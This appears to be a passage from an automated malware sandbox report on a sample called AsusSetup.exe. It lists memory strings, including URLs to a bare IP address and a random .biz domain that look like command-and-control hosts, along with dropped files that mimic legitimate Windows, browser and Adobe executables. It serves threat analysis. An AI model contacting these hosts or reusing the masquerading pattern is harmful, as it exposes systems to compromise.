Source: alg.exe, 00000003.00000003.2610742112.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2590844447.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2628578361.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
Source: alg.exe, 00000003.00000003.2590844447.0000000000577000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/tkrvouqomflftlqp
Source: alg.exe, 00000003.00000003.2610742112.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2590844447.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2628578361.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/bdrtsxymflftlqp
Source: alg.exe, 00000003.00000003.2505034831.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/tkrvouqomflftlqp
Source: alg.exe, 00000003.00000003.2590844447.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2505034831.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/uuoiubsg
Source: AsusSetup.exe, 00000000.00000003.2202574488.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.2472059916.00000000004F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pywolwnvd.biz/
Source: alg.exe, 00000003.00000003.2307234515.0000000001540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
Source: alg.exe, 00000003.00000003.2757343877.0000000000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: setup.exe1.3.drString found in binary or memory: https://clients2.google.com/cr/report
Source: alg.exe, 00000003.00000003.2343619064.0000000001540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: alg.exe, 00000003.00000003.2344356497.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2344146987.0000000001540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: alg.exe, 00000003.00000003.2757401018.0000000000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: setup.exe1.3.drString found in binary or memory: https://crashpad.chromium.org/
Source: setup.exe1.3.drString found in binary or memory: https://crashpad.chromium.org/bug/new
Source: setup.exe1.3.drString found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
Source: alg.exe, 00000003.00000003.2739269535.0000000001540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1
Source: alg.exe, 00000003.00000003.2739269535.0000000001540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1MaybeMigrateVersion1118.0.1.0in
Source: alg.exe, 00000003.00000003.2757457724.0000000000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: alg.exe, 00000003.00000003.2757457724.0000000000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
Source: alg.exe, 00000003.00000003.2739562117.0000000001540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/default-browser-agent/default-browser/1/Hash
Source: alg.exe, 00000003.00000003.2757167546.0000000000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: setup.exe1.3.drString found in binary or memory: https://support.google.com/chrome/?p=usage_stats_crash_reports
Source: setup.exe1.3.drString found in binary or memory: https://support.google.com/chrome?p=chrome_uninstall_surveymicrosoft-edge:open..
Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\9fbf4662b248c49c.binJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeCode function: 0_2_02002ED00_2_02002ED0
Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00C12ED07_2_00C12ED0
Source: C:\Windows\System32\FXSSVC.exeCode function: 10_2_00D52ED010_2_00D52ED0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 11_2_009C2ED011_2_009C2ED0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_00C32ED012_2_00C32ED0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load DriverJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: SecurityJump to behavior
Source: AsusSetup.exeStatic PE information: Resource name: DLL type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: AsusSetup.exeStatic PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.4
Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
Source: Acrobat.exe.3.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: SingleClientServicesUpdater.exe.3.drStatic PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
Source: SingleClientServicesUpdater.exe0.3.drStatic PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
Source: OneDriveSetup.exe.3.drStatic PE information: Resource name: PAYLOAD type: Microsoft Cabinet archive data, many, 47694794 bytes, 767 files, at 0x44 +A "adal.dll" +A "alertIcon.png", flags 0x4, number 1, extra bytes 20 in head, 6100 datablocks, 0x1503 compression
Source: identity_helper.exe.3.drStatic PE information: Number of sections : 12 > 10
Source: ie_to_edge_stub.exe.3.drStatic PE information: Number of sections : 11 > 10
Source: msedge_proxy.exe0.3.drStatic PE information: Number of sections : 12 > 10
Source: elevation_service.exe.0.drStatic PE information: Number of sections : 12 > 10
Source: notification_click_helper.exe.3.drStatic PE information: Number of sections : 13 > 10
Source: pwahelper.exe0.3.drStatic PE information: Number of sections : 12 > 10
Source: msedge_proxy.exe.3.drStatic PE information: Number of sections : 12 > 10
Source: setup.exe.3.drStatic PE information: Number of sections : 13 > 10
Source: elevation_service.exe0.0.drStatic PE information: Number of sections : 12 > 10
Source: msedgewebview2.exe.3.drStatic PE information: Number of sections : 14 > 10
Source: pwahelper.exe.3.drStatic PE information: Number of sections : 12 > 10
Source: msedge_pwa_launcher.exe.3.drStatic PE information: Number of sections : 13 > 10
Source: AsusSetup.exe, 00000000.00000003.2170935877.0000000002B40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDiagnosticsHub.StandardCollector.Service.exeD vs AsusSetup.exe
Source: AsusSetup.exe, 00000000.00000003.2150492355.0000000003080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs AsusSetup.exe
Source: AsusSetup.exe, 00000000.00000003.2192482783.0000000002B40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemaintenanceservice.exe0 vs AsusSetup.exe
Source: AsusSetup.exe, 00000000.00000003.2154412690.0000000002B00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs AsusSetup.exe
Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
Source: AsusSetup.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroTextExtractor.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ADelRCP.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateCore.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateOnDemand.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateSetup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate32.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVLP.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OneDriveSetup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ADNotificationManager.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeCollabSync.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WCChromeNativeMessagingHost.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AsusSetup.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
